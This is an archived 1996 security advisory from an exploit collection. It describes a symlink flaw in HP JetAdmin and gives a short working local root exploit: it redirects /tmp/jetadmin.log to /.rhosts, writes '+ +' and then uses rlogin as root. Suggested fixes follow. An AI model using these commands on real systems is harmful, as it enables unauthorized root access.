home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Hacking & Misc / bundle of exploits.sit / bundle of exploits / hpjetadmin.txt < prev    next >
Text File  |  1998-07-17  |  972b  |  28 lines
  1. r00t advisory                        [ hp jetadmin   ]
  2.                             [ Aug 26 1996   ]
  3.  
  4. -- Synposis
  5. There exists a vunerability in the hp jetadmin software that will allow any
  6. user to obtain r00t access or arbitrarily overwrite any file on that targeted
  7. system.  Hp jetadmin requires a user to be r00t in order to modify printer 
  8. configurations.  Also the jetadmin software creates mode 666 files in 
  9. /tmp/jadump and /tmp/jetadmin.log and will easily follow a symbolic link to
  10. it's target.
  11.  
  12. -- Exploitability
  13. The exploit is also absurdly simple:
  14. $ ln -s /.rhosts /tmp/jetadmin.log
  15. # wait for system administrator to manage the queue or modify printer status
  16. $ echo "+ +" >/.rhosts
  17. $ rlogin -l localhost root
  18.  
  19. -- Fixes ?
  20. Some possible fixes to this problem are to use a nice dot-matrix printer 
  21. without the jetadmin software. Or if that isn't kosher enough and you still
  22. insist on using the jetadmin software as root:
  23.  
  24. $ cd /tmp
  25. $ chmod +t .
  26. $ ln -s /dev/null jetadmin.log
  27. $ ln -s /dev/null jadump
  28.